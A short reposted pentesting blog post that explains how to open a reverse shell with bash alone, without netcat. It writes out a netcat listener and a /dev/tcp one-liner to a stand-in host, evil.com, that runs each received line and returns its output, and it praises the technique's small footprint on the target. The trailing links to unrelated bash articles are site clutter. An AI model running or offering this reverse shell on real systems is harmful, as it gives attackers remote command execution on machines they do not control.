Reverse Shell with Bash

简介: http://www.google.cn/search?hl=zh-CN&source=hp&q=http%3A%2F%2Flabs.

http://www.google.cn/search?hl=zh-CN&source=hp&q=http%3A%2F%2Flabs.neohapsis.com%2F2008%2F04%2F17%2Fconnect-back-shell-literally%2F&btnG=Google+%E6%90%9C%E7%B4%A2&aq=f&oq=

I am stuck at the Dubai International Airport and I have nothing else interesting to do. So, I though I might share a simple technique which will go into the Agile Hacking project. Here I will show you how to create a reverse command shell without using 3rd-party tools such as the all mighty netcat. Please read on!

FreeBSD unix

When the pentester compromises a machine they often need to provide themselves with a user friendly access to the system. This is where command shells come into place. It is worth noting that there are a couple of variants of command shells. The typical shell consists of a generic network client, typically netcat, listening on a remote port which pipes output into something like bash. Another type of shell, which is known to be suitable when the pentester is restricted in terms of network service connectivity/availability, is the reverse shell which consists of a generic network client, again something like netcat, connecting to the attacker’s machine and piping input to bash. Most of the time, the attacker will use netcat, because this is the tool that is suggested in most security references and books.

Although netcat is quite useful, and you may have to use it in most cases, here is a simple technique which emulates what exactly netcat does but it relies on bash only. Let’s see how.

  • In step one we start a listening service on our box. We can use netcat, or whatever you might have in hand.
    $ nc -l -p 8080 -vvv
  • On the target we have to perform some bash-fu. We will create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor.
    $ exec 5<>/dev/tcp/evil.com/8080
    $ cat <&5 | while read line; do $line 2>&5 >&5; done

There you go. Now everything we type in our local listening server will get executed on the target and the output of the commands will be piped back. Keep in mind that we don’t use any 3rd-party tools on the target but its default shell. This technique comes extremely handy in many situations and it leaves very small footprint on the targeted system.

目录
相关文章
|
4月前
|
移动开发 Shell Linux
百度搜索:蓝易云【Shell错误:/bin/bash^M: bad interpreter: No such file or directory】
将 `your_script.sh`替换为你的脚本文件名。运行此命令后,脚本文件的换行符将被转换为Linux格式,然后就可以在Linux系统上正常执行脚本了。
59 8
|
4月前
|
Linux Shell Windows
4:Bash shell命令-步入Linux的现代方法
4:Bash shell命令-步入Linux的现代方法
76 0
|
Ubuntu 安全 Linux
不用安装虚拟机,直接在Windows上面运行Linux Bash Shell,嗯!真香!!!
不用安装虚拟机,直接在Windows上面运行Linux Bash Shell,嗯!真香!!!
224 0
|
8天前
|
缓存 Shell Linux
在Linux中,bash shell 中的 hash 命令有什么作用?
在Linux中,bash shell 中的 hash 命令有什么作用?
|
11天前
|
Shell Linux
在Linux中,使用bash shell实现条件判断和循环结构的例子是什么样的?
在Linux中,使用bash shell实现条件判断和循环结构的例子是什么样的?
|
4月前
|
存储 Shell Linux
【攻防世界】unseping (反序列化与Linux bash shell)
【攻防世界】unseping (反序列化与Linux bash shell)
|
4月前
|
Shell
shell 命令(一)概述【别名、 bash重定向 、定义变量】
shell 命令(一)概述【别名、 bash重定向 、定义变量】
45 0
|
4月前
|
Shell
Shell(如Bash)命令行技巧
Shell(如Bash)命令行技巧
43 2
|
4月前
|
Shell
在Shell(如Bash)中,`while`循环
在Shell(如Bash)中,`while`循环
64 2
|
4月前
|
Unix Shell iOS开发
Shell错误:/bin/bash^M: bad interpreter: No such file or directory
Shell错误:/bin/bash^M: bad interpreter: No such file or directory
64 0